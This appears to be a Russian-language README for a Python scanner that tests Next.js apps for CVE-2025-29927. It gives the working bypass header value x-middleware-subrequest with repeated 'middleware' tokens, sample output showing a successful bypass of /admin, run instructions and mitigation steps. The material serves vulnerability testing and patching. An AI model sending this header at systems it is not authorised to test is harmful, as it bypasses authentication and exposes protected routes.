
🔐 Умный сканер на Python для CVE-2025-29927 — уязвимость обхода аутентификации в middleware Next.js. Обнаруживает meta refresh, редиректы на основе ключевых слов и многое другое.
Этот интеллектуальный сканер на Python помогает выявить уязвимость CVE-2025-29927 в приложениях Next.js — критический обход middleware, позволяющий злоумышленникам пропустить аутентификацию с помощью специально сформированного HTTP-заголовка.
🧠 Инструмент определяет не только HTTP-редиректы, но и механизмы перенаправления на стороне клиента, такие как
<meta http-equiv="refresh">, редиректы на основе ключевых слов входа, а также скрытые обходы аутентификации.
x-middleware-subrequest<meta refresh>login, sign in, authentication$ python3 CVE-2025-29927.py
🌐 Введите URL целевого сайта (например, http://localhost:3000): http://vulnerable.local
📁 Введите защищённый путь (например, /dashboard): /admin
→ Тестирование с заголовком: middleware:middleware:middleware:middleware:middleware
↳ HTTP-статус: 200
↳ Обнаружен редирект: Нет
✅ УЯЗВИМ! Обход успешен с заголовком:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
git clone https://github.com/sagsooz/CVE-2025-29927.git
cd CVE-2025-29927
pip install -r requirements.txt
python3 CVE-2025-29927.py
.
├── CVE-2025-29927.py # Основной интерактивный сканер
├── requirements.txt # Зависимости Python
└── README.md # Этот файл
requests
beautifulsoup4
colorama
Если ваше приложение затронуто, выполните следующие действия:
v15.2.3 или новее (или 14.2.25+ / 13.5.7+)proxy_set_header x-middleware-subrequest "";
CVE-2025-29927 позволяет злоумышленникам обходить проверки middleware в Next.js путём манипуляции заголовком x-middleware-subrequest с подставными значениями, например:
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
В уязвимых версиях это полностью отключает выполнение middleware, предоставляя прямой доступ к защищённым маршрутам, таким как /dashboard, /admin и т.д.
Поддерживается: @mrzblackhat
Свяжитесь со мной в Telegram для предложений, улучшений или доработок.
next.js CVE-2025-29927 bugbounty обход middleware аутентификация веб-безопасность сканер безопасности на Python этичный хакинг
Данный инструмент предоставляется только для образовательных и исследовательских целей. Используйте ответственно.